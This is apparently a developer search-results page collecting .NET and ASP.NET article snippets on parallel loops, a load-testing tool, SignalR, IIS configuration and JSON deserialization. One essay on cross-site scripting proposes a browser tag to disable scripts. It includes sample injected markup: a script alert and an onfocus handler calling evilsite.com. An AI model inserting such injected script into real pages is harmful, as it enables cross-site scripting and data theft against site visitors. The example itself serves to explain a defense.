Search Results

Search found 56102 results on 2245 pages for 'asp net mvc helpers'.

Page 573 of 2245

  • Parallel features in .Net 4.0

    - by Jonathan.Peppers
    I have been going over the practicality of some of the new parallel features in .Net 4.0. Say I have code like so: foreach (var item in myEnumerable) myDatabase.Insert(item.ConvertToDatabase()); Imagine myDatabase.Insert is performing some work to insert into a SQL database. Theoretically you could write: Parallel.ForEach(myEnumerable, item => myDatabase.Insert(item.ConvertToDatabase())); And automatically you get code that takes advantage of multiple cores. But what if myEnumerable can only be interacted with by a single thread? Will the Parallel class enumerate on a single thread and only dispatch the results to worker threads in the loop? What if myDatabase can only be interacted with by a single thread? It would certainly not be better to make a database connection per iteration of the loop. Finally, what if my "var item" happens to be a UserControl or something that must be interacted with on the UI thread? What design pattern should I follow to solve these problems? It looks to me like switching over to Parallel/PLINQ/etc. is not exactly easy when you are dealing with real-world applications.
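
    One hedged option for the per-iteration connection concern is the Parallel.ForEach overload that carries thread-local state, so each worker thread creates and reuses a single connection. This is only a minimal sketch, not the asker's code: the Item and MyDatabase types below are stand-ins for whatever the real myEnumerable and myDatabase are.

        using System;
        using System.Collections.Generic;
        using System.Threading.Tasks;

        // Stand-in types mirroring the names used in the question.
        class Item { public object ConvertToDatabase() { return this; } }

        class MyDatabase : IDisposable
        {
            public void Insert(object row) { /* SQL insert would go here */ }
            public void Dispose() { /* close the connection */ }
        }

        static class ParallelInsertSketch
        {
            static void InsertAll(IEnumerable<Item> myEnumerable)
            {
                Parallel.ForEach(
                    myEnumerable,
                    // localInit: one database object per worker thread
                    () => new MyDatabase(),
                    // body: each thread reuses its own database object
                    (item, loopState, db) =>
                    {
                        db.Insert(item.ConvertToDatabase());
                        return db;
                    },
                    // localFinally: dispose the per-thread database object
                    db => db.Dispose());
            }
        }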

    Read the article

  • West Wind WebSurge - an easy way to Load Test Web Applications

    - by Rick Strahl
    A few months ago on a project the subject of load testing came up. We were having some serious issues with a Web application that would start spewing SQL lock errors under somewhat heavy load. These sorts of errors can be tough to catch, precisely because they only occur under load and not during typical development testing. To replicate this error more reliably we needed to put a load on the application and run it for a while before these SQL errors would flare up. It’s been a while since I’d looked at load testing tools, so I spent a bit of time looking at different tools and frankly didn’t really find anything that was a good fit. A lot of tools were either a pain to use, didn’t have the basic features I needed, or were extravagantly expensive. In the end I got frustrated enough to build an initially small custom load test solution that then morphed into a more generic library, then gained a console front end and eventually turned into a full blown Web load testing tool that is now called West Wind WebSurge. I got seriously frustrated looking for tools every time I needed some quick and dirty load testing for an application. If my aim is to just put an application under heavy enough load to find a scalability problem in code, or to simply try and push an application to its limits on the hardware it’s running on, I shouldn’t have to struggle to set up tests. It should be easy enough to get going in a few minutes, so that testing can be set up quickly and done on a regular basis without a lot of hassle. And that was the goal when I started to build out my initial custom load tester into a more widely usable tool. If you’re in a hurry and you want to check it out, you can find more information and download links here: West Wind WebSurge Product Page Walk through Video Download link (zip) Install from Chocolatey Source on GitHub For a more detailed discussion of the why’s and how’s and some background continue reading. How did I get here? When I started out on this path, I wasn’t planning on building a tool like this myself – but I got frustrated enough looking at what’s out there to think that I can do better than what’s available for the most common simple load testing scenarios. When we ran into the SQL lock problems I mentioned, I started looking around at what’s available for Web load testing solutions that would work for our whole team, which consisted of a few developers and a couple of IT guys, both of whom needed to be able to run the tests. It had been a while since I looked at tools and I figured that by now there should be some good solutions out there, but as it turns out I didn’t really find anything that fit our relatively simple needs without costing an arm and a leg… I spent the better part of a day installing and trying various load testing tools and to be frank most of them were either terrible at what they do, incredibly unfriendly to use, used some terminology I couldn’t even parse, or were extremely expensive (and I mean in the ‘sell your liver’ range of expensive). Pick your poison. There are also a number of online solutions for load testing and they actually looked more promising, but those wouldn’t work well for our scenario as the application is running inside of a private VPN with no outside access into the VPN. Most of those online solutions also ended up being very pricey as well – presumably because the bandwidth required to test over the open Web can be enormous.
    When I asked around on Twitter what people were using – I got mostly… crickets. Several people mentioned Visual Studio Load Test, and most other suggestions pointed to online solutions. I did get a bunch of responses though with people asking to let them know what I found – apparently I’m not alone when it comes to finding load testing tools that are effective and easy to use. As to Visual Studio, the higher end SKUs of Visual Studio and the test edition include a Web load testing tool, which is quite powerful, but there are a number of issues with that: First it’s tied to Visual Studio so it’s not very portable – you need a VS install. I also find the test setup and terminology used by the VS test runner extremely confusing. Heck, it’s complicated enough that there’s even a Pluralsight course on using the Visual Studio Web test from Steve Smith. And of course you need to have one of the high end Visual Studio SKUs, and those are mucho Dinero ($$$) – just for the load testing that’s rarely an option. Some of the tools are ultra extensive and let you run analysis tools on the target servers which is useful, but in most cases – just plain overkill and only distracts from what I tend to be ultimately interested in: Reproducing problems that occur at high load, and finding the upper limits and ‘what if’ scenarios as load is ramped up increasingly against a site. Yes it’s useful to have Web app instrumentation, but often that’s not what you’re interested in. I still fondly remember the early days of Web testing when Microsoft had the WAST (Web Application Stress Tool), which was rather simple – and also somewhat limited – but easily allowed you to create stress tests very quickly. It had some serious limitations (mainly that it didn’t work with SSL), but the idea behind it was excellent: Create tests quickly and easily and provide a decent engine to run them locally with minimal setup. You could get set up and run tests within a few minutes. Unfortunately, that tool died a quiet death, as have so many of Microsoft’s tools that were probably built by an intern and then abandoned, even though there was a lot of potential and it was actually fairly widely used. Eventually the tool was no longer downloadable and now it simply doesn’t work anymore on higher end hardware. West Wind Web Surge – Making Load Testing Quick and Easy So I ended up creating West Wind WebSurge out of rebellious frustration… The goal of WebSurge is to make it drop dead simple to create load tests. It’s super easy to capture sessions either using the built in capture tool (big props to Eric Lawrence, Telerik and FiddlerCore which made that piece a snap), using the full version of Fiddler and exporting sessions, or by manually or programmatically creating text files based on plain HTTP headers to create requests. I’ve been using this tool for 4 months now on a regular basis on various projects as a reality check for performance and scalability and it’s worked extremely well for finding small performance issues. I also use it regularly as a simple URL tester, as it allows me to quickly enter a URL plus headers and content and test that URL and its results along with the ability to easily save one or more of those URLs. A few weeks back I made a walk through video that goes over most of the features of WebSurge in some detail: Note that the UI has slightly changed since then, so there are some UI improvements.
    Most notably the test results screen has been updated recently to a different layout and to provide more information about each URL in a session at a glance. The video and the main WebSurge site have a lot of info on basic operations. For the rest of this post I’ll talk about a few deeper aspects that may be of interest while also giving a glance at how WebSurge works. Session Capturing As you would expect, WebSurge works with Sessions of URLs that are played back under load. Here’s what the main Session View looks like: You can create session entries manually by individually adding URLs to test (on the Request tab on the right) and saving them, or you can capture output from Web Browsers, Windows Desktop applications that call services, or your own applications using the built in Capture tool. With this tool you can capture anything HTTP – SSL requests and content from Web pages, AJAX calls, SOAP or REST services – again anything that uses Windows or .NET HTTP APIs. Behind the scenes the capture tool uses FiddlerCore so basically anything you can capture with Fiddler you can also capture with the WebSurge Session capture tool. Alternately you can actually use Fiddler as well, and then export the captured Fiddler trace to a file, which can then be imported into WebSurge. This is a nice way to let somebody capture a session without having to actually install WebSurge, or for your customers to provide an exact playback scenario for a given set of URLs that cause a problem. Note that not all applications work with Fiddler’s proxy unless you configure a proxy. For example, .NET Web applications that make HTTP calls usually don’t show up in Fiddler by default. For those .NET applications you can explicitly override proxy settings to capture those requests to service calls. The capture tool also has handy optional filters that allow you to filter by domain, to help block out noise that you typically don’t want to include in your requests. For example, if your pages include links to CDNs, or Google Analytics or social links you typically don’t want to include those in your load test, so by capturing just from a specific domain you are guaranteed content from only that one domain. Additionally you can provide URL filters in the configuration file – filters allow you to provide filter strings that, if contained in a URL, will cause requests to be ignored. Again this is useful if you don’t filter by domain but you want to filter out things like static image, css and script files, etc. Often you’re not interested in the load characteristics of these static and usually cached resources as they just add noise to tests and often skew the overall URL performance results. In my testing I tend to care only about my dynamic requests. SSL Captures require Fiddler Note that in order to capture SSL requests you’ll have to install Fiddler’s SSL certificate. The easiest way to do this is to install Fiddler and use its SSL configuration options to get the certificate into the local certificate store. There’s a document on the Telerik site that provides the exact steps to get SSL captures to work with Fiddler and therefore with WebSurge. Session Storage A group of URLs entered or captured makes up a Session. Sessions can be saved and restored easily as they use a very simple text format that is simply stored on disk. The format is slightly customized HTTP header traces separated by a separator line.
    The headers are standard HTTP headers except that the full URL, instead of just the domain relative path, is stored as part of the 1st HTTP header line for easier parsing. Because it’s just text and uses the same format that Fiddler uses for exports, it’s super easy to create Sessions by hand manually or under program control writing out to a simple text file. You can see what this format looks like in the Capture window figure above – the raw captured format is also what’s stored to disk and what WebSurge parses from. The only ‘custom’ part of these headers is that the 1st line contains the full URL instead of the domain relative path and Host: header. The rest of each header is just plain standard HTTP headers, with each individual URL isolated by a separator line. The format used here is also what Fiddler produces for exports, so it’s easy to exchange or view data either in Fiddler or WebSurge. URLs can also be edited interactively so you can modify the headers easily as well: Again – it’s just plain HTTP headers so anything you can do with HTTP can be added here. Use it for single URL Testing Incidentally I’ve also found this form to be an excellent way to test and replay individual URLs for simple non-load testing purposes. Because you can capture a single or many URLs and store them on disk, this also provides a nice HTTP playground where you can record URLs with their headers, and fire them one at a time or as a session and see results immediately. It’s actually an easy way to do REST presentations, and I find the simple UI flow easier than using Fiddler natively. Finally you can save one or more URLs as a session for later retrieval. I’m using this more and more for simple URL checks. Overriding Cookies and Domains Speaking of HTTP headers – you can also overwrite cookies used as part of the options. One thing that happens with modern Web applications is that you have session cookies in use for authorization. These cookies tend to expire at some point which would invalidate a test. Using the Options dialog you can actually override the cookie, which replaces the cookie for all requests with the cookie value specified here. You can capture a valid cookie from a manual HTTP request in your browser and then paste it into the cookie field, to replace the existing Cookie with the new one that is now valid. Likewise you can easily replace the domain, so if you captured URLs on west-wind.com and now you want to test on localhost you can do that easily as well. You could even do something like capture on store.west-wind.com and then test on localhost/store which would also work. Running Load Tests Once you’ve created a Session you can specify the length of the test in seconds, and specify the number of simultaneous threads to run each session on. Sessions run through each of the URLs in the session sequentially by default. One option in the options list above is that you can also randomize the URLs so each thread runs requests in a different order. This avoids bunching up URLs initially when tests start, as all threads run the same requests simultaneously which can sometimes skew the results of the first few minutes of a test. While sessions run, some progress information is displayed: By default there’s a live view of requests displayed in a Console-like window. On the bottom of the window there’s a running total summary that displays where you’re at in the test, how many requests have been processed and what the requests per second count is currently for all requests.
    Note that for tests that run over a thousand requests a second it’s a good idea to turn off the console display. While the console display is nice to see that something is happening and also gives you a slight idea of what’s happening with actual requests, once a lot of requests are processed, this UI updating actually adds a lot of CPU overhead to the application which may cause the actual load generated to be reduced. If you are running 1000 requests a second there’s not much to see anyway as requests roll by way too fast to see individual lines. If you look on the options panel, there is a NoProgressEvents option that disables the console display. Note that the summary display is still updated approximately once a second so you can always tell that the test is still running. Test Results When the test is done you get a simple Results display: On the right you get an overall summary as well as a breakdown by each URL in the session. Both successes and failures are highlighted so it’s easy to see what’s breaking in your load test. The report can be printed or you can also open the HTML document in your default Web Browser for printing to PDF or saving the HTML document to disk. The list on the right shows you a partial list of the URLs that were fired so you can look in detail at the request and response data. The list can be filtered by success and failure requests. Each list is partial only (at the moment) and limited to a max of 1000 items in order to render reasonably quickly. Each item in the list can be clicked to see the full request and response data: This is particularly useful for errors so you can quickly see and copy what request data was used, and in the case of a GET request you can also just click the link to quickly jump to the page. For non-GET requests you can find the URL in the Session list, and use the context menu to Test the URL as configured including any HTTP content data to send. You get to see the full HTTP request and response as well as a link in the Request header to go visit the actual page. Not so useful for a POST as above, but definitely useful for GET requests. Finally you can also get a few charts. The most useful one is probably the Requests per Second chart which can be accessed from the Charts menu or shortcut. Here’s what it looks like: Results can also be exported to JSON, XML and HTML. Keep in mind that these files can get very large rather quickly though, so exports can end up taking a while to complete. Command Line Interface WebSurge runs with a small core load engine and this engine is plugged into the front end application I’ve shown so far. There’s also a command line interface available to run WebSurge from the Windows command prompt. Using the command line you can run tests for either an individual URL (similar to AB.exe for example) or a full Session file. By default when it runs, WebSurgeCli shows progress every second showing total request count, failures and the requests per second for the entire test. A silent option can turn off this progress display and display only the results. The command line interface can be useful for build integration, which allows checking for failures or for hitting a specific requests per second count, etc. It’s also nice to use this as a quick and dirty URL test facility similar to the way you’d use Apache Bench (ab.exe). Unlike ab.exe though, WebSurgeCli supports SSL and makes it much easier to create multi-URL tests using either manual editing or the WebSurge UI.
    Current Status Currently West Wind WebSurge is still in Beta status. I’m still adding small new features and tweaking the UI in an attempt to make it as easy and self-explanatory as possible to run. Documentation for the UI and specialty features is also still a work in progress. I plan on open-sourcing this product, but it won’t be free. There’s a free version available that provides a limited number of threads and request URLs to run. A relatively low cost license removes the thread and request limitations. Pricing info can be found on the Web site – there’s an introductory price which is $99 at the moment, which I think is reasonable compared to most other for-pay solutions out there that are exorbitant by comparison… The reason the code is not available yet is – well, the UI portion of the app is a bit embarrassing in its current monolithic state. The UI started as a very simple interface originally that later got a lot more complex – yeah, that never happens, right? Unless there’s a lot of interest I don’t foresee re-writing the UI entirely (which would be ideal), but in the meantime at least some cleanup is required before I dare to publish it :-). The code will likely be released with version 1.0. I’m very interested in feedback. Do you think this could be useful to you and provide value over other tools you may or may not have used before? I hope so – it already has provided a ton of value for me and the work I do, which made the development worthwhile at this point. You can leave a comment below, or for more extensive discussions you can post a message on the West Wind Message Board in the WebSurge section. Microsoft MVPs and Insiders get a free License If you’re a Microsoft MVP or a Microsoft Insider you can get a full license for free. Send me a link to your current, official Microsoft profile and I’ll send you a not-for-resale license. Send any messages to [email protected]. Resources For more info on WebSurge and to download it to try it out, use the following links: West Wind WebSurge Home, Download West Wind WebSurge, Getting Started with West Wind WebSurge Video. © Rick Strahl, West Wind Technologies, 2005-2014. Posted in ASP.NET

    Read the article

  • Wishful Thinking: Why can't HTML fix Script Attacks at the Source?

    - by Rick Strahl
    The Web can be an evil place, especially if you're a Web Developer blissfully unaware of Cross Site Script Attacks (XSS). Even if you are aware of XSS in all of its insidious forms, it's extremely complex to deal with all the issues if you're taking user input and you're actually allowing users to post raw HTML into an application. I'm dealing with this again today in a Web application where legacy data contains raw HTML that has to be displayed and users ask for the ability to use raw HTML as input for listings. The first line of defense of course is: Just say no to HTML input from users. If you don't allow HTML input directly and use HTML Encoding (HttpUtility.HtmlEncode() in .NET or using standard ASP.NET MVC output @Model.Content) you're fairly safe at least from the HTML input provided. Both WebForms and Razor support HtmlEncoded content, although Razor makes it the default. In Razor the default @ expression syntax:@Model.UserContent automatically produces HTML encoded content (safe by default) - you actually have to go out of your way to create raw HTML content using @Html.Raw() or the HtmlString class. In Web Forms (V4) you can use:<%: Model.UserContent %> or if you're using a version prior to 4.0:<%= HttpUtility.HtmlEncode(Model.UserContent) %> This works great as a hedge against embedded <script> tags and HTML markup, as any HTML is turned into text that displays the markup but doesn't render it. But it turns any embedded HTML markup tags into plain text. If you need to display HTML in raw form with the markup tags rendering based on user input, this approach is worthless. If you do accept HTML input and need to echo the rendered HTML input back, the task of cleaning up that HTML is a complex one. In the projects I work on, customers are asking for the ability to post raw HTML quite frequently. Almost every app that I've built where there's document content from users we start out with text only input - possibly using something like MarkDown - but inevitably users want to just post plain old HTML they created in some other rich editing application. I see this a lot with realtors especially, who often want to reuse their postings easily in multiple places. In my work this is a common problem I need to deal with and I've tried dozens of different methods, from sanitizing and simple rejection of input to custom markup schemes, none of which have ever felt comfortable to me. They work in a half assed, hacked together sort of way but I always live in fear of missing something vital which is *really easy to do*. My Wishlist Item: A <restricted> tag in HTML Let me dream here for a second on how to address this problem. It seems to me the easiest place where this can be fixed is: In the browser. Browsers are actually executing script code so they have a lot of control over the script code that resides in a page. What if there was a way to specify that you want to turn off script code for a block of HTML? The main issue when dealing with raw HTML input isn't that we as developers are unaware of the implications of user input, but the fact that we sometimes have to display raw HTML input the user provides. So the problem markup is usually isolated in only a very specific part of the document. So, what if we had a way to specify that in any given HTML block, no script code could execute by wrapping it into a tag that disables all script functionality in the browser? This would include <script> tags and any document script attributes like onclick, onfocus etc.
    and potentially also disallow things like iFrames that can potentially be scripted from within the iFrame's target. I'd like to see something along these lines:<article> <restricted allowscripts="no" allowiframes="no"> <div>Some content</div> <script>alert('go ahead make my day, punk!');</script> <div onfocus="$.getJson('http://evilsite.com/')">more content</div> </restricted> </article> A tag like this would basically disallow all script code from firing from any HTML that's rendered within it. You'd use this only on code that you actually render from your data only and only if you are dealing with custom data. So something like this:<article> <restricted> @Html.Raw(Model.UserContent) </restricted> </article> For browsers this would actually be easy to intercept. They render the DOM and control loading and execution of scripts that are loaded through it. All the browser would have to do is suspend execution of <script> tags and not hook up any event handlers defined via markup in this block. Given all the crazy XSS attacks that exist and the prevalence of this problem this would go a long way towards preventing at least coded script attacks in the DOM. And it seems like a totally doable solution that wouldn't be very difficult to implement by vendors. There would also need to be some logic in the parser to not allow an </restricted> or <restricted> tag into the content, so the content can't short-circuit the restricted section (per James Hart's comment). I'm sure there are other issues to consider as well that I didn't think of in my off-the-back-of-a-napkin concept here, but the idea overall seems worth consideration I think. Without code running in a user supplied HTML block it'd be pretty hard to compromise a local HTML document and pass information like Cookies to a server. Or even send data to a server period. Short of an iFrame that can access the parent frame (which is another restriction that should be available on this <restricted> tag) that could potentially communicate back, there's not a lot a malicious site could do. The HTML could still 'phone home' via image links and href links potentially and basically say this site was accessed, but without the ability to run script code it would be pretty tough to pass along critical information to the server beyond that. Ahhhh… one can dream… Not holding my breath of course. The design by committee that is the W3C can't agree on anything in timeframes measured in less than decades, but maybe this is one place where browser vendors can actually step up the pressure. This is something in their best interest, to reduce the attack surface for vulnerabilities on their browser platforms significantly. Several people commented on Twitter today that there isn't enough discussion on issues like this that address serious needs in the web browser space. Realistically security has to be a number one concern with Web applications in general - there isn't a Web app out there that is not vulnerable. And yet nothing has been done to address these security issues even though there might be relatively easy solutions to make this happen.
    It'll take time, and it's probably not going to happen in our lifetime, but maybe this rambling thought sparks some ideas on how this sort of restriction can get into browsers in some way in the future. © Rick Strahl, West Wind Technologies, 2005-2012. Posted in ASP.NET, HTML5, HTML, Security

    Read the article

  • A first look at SignalR

    - by Rick Strahl
    Last month I finally had a chance to use SignalR in a live project for the first time, and I've been impressed by what this technology offers to .NET developers. It's easy to use and provides rich real-time two-way messaging between client and server applications, as well as the ability to broadcast messages to all connected clients. This is technology that offers many opportunities to rethink what we can build with Web applications.
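
    For flavor, here is a minimal hub sketch - not code from the article, and the class, method and client callback names are invented; it assumes the Microsoft.AspNet.SignalR hub model.

        using Microsoft.AspNet.SignalR;

        // A hub exposes methods that connected clients can call;
        // Clients.All broadcasts back to every connected client.
        public class ChatHub : Hub
        {
            public void Send(string name, string message)
            {
                // "addMessage" is a dynamically dispatched client-side callback name.
                Clients.All.addMessage(name, message);
            }
        }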

    Read the article

  • Development Quirk From ASP.NET Dynamic Compilation

    - by jkauffman
    The Problem I got a compilation error in my ASP.NET MVC3 project that tested my sanity today. (As always, names are changed to protect the innocent) The type or namespace name 'FishViewModel' does not exist in the namespace 'Company.Product.Application.Models' (are you missing an assembly reference?) Sure looks easy! There must be something in the project referring to a FishViewModel. The Confusing Part The first thing I noticed was that the error was occurring in a folder clearly not in my project and in files that I definitely had not created: %SystemRoot%\Microsoft.NET\Framework\(versionNumber)\Temporary ASP.NET Files\ App_Web_mezpfjae.1.cs I also ascertained these facts, each of which made me more confused than the last: Rebuild and Clean had no effect. No controllers in the project ever returned a ViewResult using FishViewModel. No views in the project defined that they use FishViewModel. Searching across all files included in the project for “FishViewModel” provided no results. The build server did not report a problem. The Solution The problem stemmed from a file that was not included in the project but still present on the file system: (By the way, if you don’t know this trick already, there is a toolbar button in the Solution Explorer window to “Show All Files” which allows you to see all files in the file system) In my situation, I was working on the mission-critical Fish view before abandoning the feature. Instead of deleting the file, I excluded it from the project. However, this was a bad move. It caused the build failure, and in order to fix the error, this file must be deleted. By the way, this file was not in source control, so the build server did not have it. This explains why my build server did not report a problem for me. The Explanation So, what’s going on? This file isn’t even a part of the project, so why is it failing the build? This is a behavior of ASP.NET Dynamic Compilation. This is the same process that occurs when deploying a webpage; ASP.NET compiles the web application’s code. When this occurs on a production server, it has to do so without the .csproj file (which isn’t usually deployed, if you’ve taken your time to do a deployment cleanly). This process has merely the file system available to identify what to compile. So, back in the world of developing the webpage in Visual Studio on my developer box, I run into the situation because the same process is occurring there. This is true even though I have more files on my machine than will actually get deployed. I can’t help but think that this error could be attributed back to the real culprit file (Fish.cshtml, rather than the temporary files) with some work, but at least the error had enough information in it to narrow it down. The Conclusion I had previously been accustomed to the idea that for C# projects, the .csproj file always “defines” the build behavior. This investigation has taught me that I’ll need to shift my thinking a bit to remember that the file system has the final say when it comes to web applications, even on the developer’s machine!

    Read the article

  • Generic HTTP 500 Error Message On Hosted Sites (like GoDaddy)

    - by Jimbo
    I decided to post this because I battled to find out how to do it and couldn't see anything on Stack Overflow about it. Often when you host with a provider like GoDaddy, they have "Custom Error Messages" set to ON. What I didn't realise was that the web.config settings don't just apply to ASP.NET, they apply to all applications on YOUR IIS site and hence will sort this problem out for Classic ASP as well (very few GoDaddy support people even know this). All you need to do is add the following to your web.config OR, for those using Classic ASP, just create a web.config file in your ROOT with this code in it. <configuration> <system.webServer> <asp scriptErrorSentToBrowser="true"/> <httpErrors errorMode="Detailed"/> </system.webServer> </configuration>

    Read the article

  • IIS7 - how to place application in a folder inside application web site

    - by Nir
    I have a static web site with a blog (an ASP.NET application), the blog is in a subdirectory of the web site so: example.com/, example.com/Something.htm, example.com/folder/somefile.htm, etc. - are all static files; example.com/blog, example.com/blog/categories.aspx, example.com/blog/2011/11/09/post-name.aspx, etc. - all go to the blog app. I'm upgrading the static part of the web site to a dynamic site (also an ASP.NET application) and the blog is incompatible with the new app (the app needs handlers and modules loaded in web.config that don't work with the blog). Also, I have to keep all the old URLs the same - so I can't move the blog to a subdomain or the new app to a folder, and the blog generates links based on its folder so clever redirection tricks wouldn't work. Is there a way to place an ASP.NET application in a folder inside another application (either as a real or virtual folder) so that the root web.config settings don't apply to the application folder? Or some other trick I didn't think of? The system is running IIS7 on Windows Server 2008 64bit, I have full control over the server's configuration. I can't modify the blog's source code but I can edit its web.config and other configuration. I can modify the source of the new application but I can't make it compatible with the blog (most of its usefulness comes from a 3rd party library that is not compatible with the blog). The blog is an ASP.NET 3.5 WebForms application. The new root application is an ASP.NET 4.0 MVC application.
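
    One hedged idea worth testing (a sketch only, not a verified answer for this exact setup): ASP.NET's <location> element supports an inheritInChildApplications attribute, so the root site's conflicting sections can be wrapped so that they are not inherited by the /blog child application.

        <!-- Sketch for the ROOT application's web.config; assumes the conflicting
             handlers/modules live in the wrapped sections. Settings inside this
             location element are not inherited by child applications such as /blog. -->
        <configuration>
          <location path="." inheritInChildApplications="false">
            <system.web>
              <!-- root-only settings here -->
            </system.web>
          </location>
        </configuration>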

    Read the article

  • Troubleshooting intermittently long 'page loading' problem

    - by justSteve
    Working off IIS 7 with an ASP.NET MVC app. Most page accesses are lightning quick. Sometimes the browser reports 'page loading' for an exceptionally long time. We are still in development/testing mode so it's not a network/bandwidth issue. Happens in both IE and FF. No explicit error conditions in the server logs. If I could reproduce it I could run Firebug/Fiddler to give more info. As it is, it's a little too infrequent to simply leave both those running hoping for the condition to fire - unless/until that's the only option to get better info. I have a hunch this is client-side jQuery/AJAX related but only a hunch - don't have enough background in either jQuery or MVC to really know what can go wrong. Any initial troubleshooting suggestions welcome. thx

    Read the article

  • Apache ProxyPass/ProxyPassReverse to IIS

    - by Dana
    We have an ASP.NET web application which is mapped to a folder on an Apache-hosted PHP site using ProxyPass/ProxyPassReverse. A couple of problems are being encountered. Cookies are being lost, which breaks the site navigation; this can be overcome by setting the ASP.NET app as cookieless. Forms authentication is used on the ASP.NET site; this is also broken with the ProxyPass in place - I suspect this is cookie related also. The ASP.NET site works OK when run from a domain/IP address. Use of a separate domain / sub-domain is not an option due to client requirements.

    Read the article

  • Running .NET app from network share in Win 7?

    - by mlangille
    We have a .NET 1.1 application that we keep on a network share. We install the .NET Framework on the local PCs and also set full trust via the following: %windir%\Microsoft.NET\Framework\v1.1.4322\caspol -pp off -cg LocalIntranet_Zone FullTrust This has worked fine on all PCs to date; however, now we have a few new PCs with Win7 and the process no longer works. The app will run fine from a local drive in Win7 but running the networked copy results in a general exception error. Any ideas on how to get this to work under Win7?

    Read the article

  • Will my OS support these tools?

    - by Zerotoinfinite
    I am currently using Windows Server 2003 and I want to install Windows XP [SP1 or SP2 or SP3] or maybe Vista. I have many applications which I can run on Windows Server 2003 and I am curious to know if I could run the same on XP or Vista. Please help me decide whether to change my OS or not; here is the list of software and apps I want to work with: Visual Studio 2008/2010 SQL Server 2008 ASP.NET MVC and Entity Framework WPF application P.S.: I can create all my applications [except WPF] with Windows Server 2003. I have an idea that I can install VS 2008 on XP but I'm not exactly sure about the MVC framework and other recent technology stuff.

    Read the article

  • What data should I (can I) gather to prove a .net bug in third party software?

    - by gef05
    Our users are using a third-party system and every so often - a user might go all day without this happening, other days they may see it two or three times in seven hours - a red X will appear on screen rather than a button, field, or control. This is a .NET system. Looking online I can see that this is a .NET error. Problem is, our devs didn't write it, and the vendor wants proof that the problem resides with their system, not our PCs. What can we do to gather information on such an issue that would allow us to make our case to the vendor and get them to create a fix? I'm thinking of data to gather - anything from the OS and memory to the .NET version installed, etc. But I'd also like to know about error logging - whether it's possible to log errors that occur in third-party systems.

    Read the article

  • Deserializing JSON data to C# using JSON.NET

    - by Derek Utah
    I'm relatively new to working with C# and JSON data and am seeking guidance. I'm using C# 3.0, with .NET3.5SP1, and JSON.NET 3.5r6. I have a defined C# class that I need to populate from a JSON structure. However, not every JSON structure for an entry that is retrieved from the web service contains all possible attributes that are defined within the C# class. I've been doing what seems to be the wrong, hard way and just picking out each value one by one from the JObject and transforming the string into the desired class property. JsonSerializer serializer = new JsonSerializer(); var o = (JObject)serializer.Deserialize(myjsondata); MyAccount.EmployeeID = (string)o["employeeid"][0]; What is the best way to deserialize a JSON structure into the C# class and handle possible missing data from the JSON source? My class is defined as: public class MyAccount { [JsonProperty(PropertyName = "username")] public string UserID { get; set; } [JsonProperty(PropertyName = "givenname")] public string GivenName { get; set; } [JsonProperty(PropertyName = "sn")] public string Surname { get; set; } [JsonProperty(PropertyName = "passwordexpired")] public DateTime PasswordExpire { get; set; } [JsonProperty(PropertyName = "primaryaffiliation")] public string PrimaryAffiliation { get; set; } [JsonProperty(PropertyName = "affiliation")] public string[] Affiliation { get; set; } [JsonProperty(PropertyName = "affiliationstatus")] public string AffiliationStatus { get; set; } [JsonProperty(PropertyName = "affiliationmodifytimestamp")] public DateTime AffiliationLastModified { get; set; } [JsonProperty(PropertyName = "employeeid")] public string EmployeeID { get; set; } [JsonProperty(PropertyName = "accountstatus")] public string AccountStatus { get; set; } [JsonProperty(PropertyName = "accountstatusexpiration")] public DateTime AccountStatusExpiration { get; set; } [JsonProperty(PropertyName = "accountstatusexpmaxdate")] public DateTime AccountStatusExpirationMaxDate { get; set; } [JsonProperty(PropertyName = "accountstatusmodifytimestamp")] public DateTime AccountStatusModified { get; set; } [JsonProperty(PropertyName = "accountstatusexpnotice")] public string AccountStatusExpNotice { get; set; } [JsonProperty(PropertyName = "accountstatusmodifiedby")] public Dictionary<DateTime, string> AccountStatusModifiedBy { get; set; } [JsonProperty(PropertyName = "entrycreatedate")] public DateTime EntryCreatedate { get; set; } [JsonProperty(PropertyName = "entrydeactivationdate")] public DateTime EntryDeactivationDate { get; set; } } And a sample of the JSON to parse is: { "givenname": [ "Robert" ], "passwordexpired": "20091031041550Z", "accountstatus": [ "active" ], "accountstatusexpiration": [ "20100612000000Z" ], "accountstatusexpmaxdate": [ "20110410000000Z" ], "accountstatusmodifiedby": { "20100214173242Z": "tdecker", "20100304003242Z": "jsmith", "20100324103242Z": "jsmith", "20100325000005Z": "rjones", "20100326210634Z": "jsmith", "20100326211130Z": "jsmith" }, "accountstatusmodifytimestamp": [ "20100312001213Z" ], "affiliation": [ "Employee", "Contractor", "Staff" ], "affiliationmodifytimestamp": [ "20100312001213Z" ], "affiliationstatus": [ "detached" ], "entrycreatedate": [ "20000922072747Z" ], "username": [ "rjohnson" ], "primaryaffiliation": [ "Staff" ], "employeeid": [ "999777666" ], "sn": [ "Johnson" ] }
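
    A hedged sketch of an alternative - not the asker's code, and the converter name is invented: a Json.NET JsonConverter that unwraps the single-element arrays the service returns for string properties, so the object can be deserialized in one call such as JsonConvert.DeserializeObject<MyAccount>(json, new SingleValueArrayConverter()). The DateTime properties wrapped in arrays would need similar treatment.

        using System;
        using Newtonsoft.Json;
        using Newtonsoft.Json.Linq;

        // Unwraps values like "givenname": [ "Robert" ] into a plain string property.
        public class SingleValueArrayConverter : JsonConverter
        {
            public override bool CanConvert(Type objectType)
            {
                return objectType == typeof(string);
            }

            public override object ReadJson(JsonReader reader, Type objectType,
                                            object existingValue, JsonSerializer serializer)
            {
                JToken token = JToken.ReadFrom(reader);
                if (token.Type == JTokenType.Array)
                {
                    // Take the first element of the wrapping array, if any.
                    return token.HasValues ? (string)token.First : null;
                }
                return (string)token;
            }

            public override bool CanWrite
            {
                get { return false; }
            }

            public override void WriteJson(JsonWriter writer, object value, JsonSerializer serializer)
            {
                throw new NotSupportedException();
            }
        }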

    Read the article

  • Twitter bootstrap + asp.net masterpages, how to set navbar item as active when user selects it?

    - by ase69s
    We are in the same situation as the question Make Twitter Bootstrap navbar link active, but in our case we are using ASP.NET and MasterPages... The thing is, the navbar is defined in the master page and when you click a menu item you are redirected to the corresponding child page, so what would you do to change the navbar active item accordingly without replicating the logic in each child page? (Preferably without session variables, and with JavaScript only in the master page)

    Read the article

  • ADO.NET Data Services Entity Framework request error when property setter is internal

    - by Jim Straatman
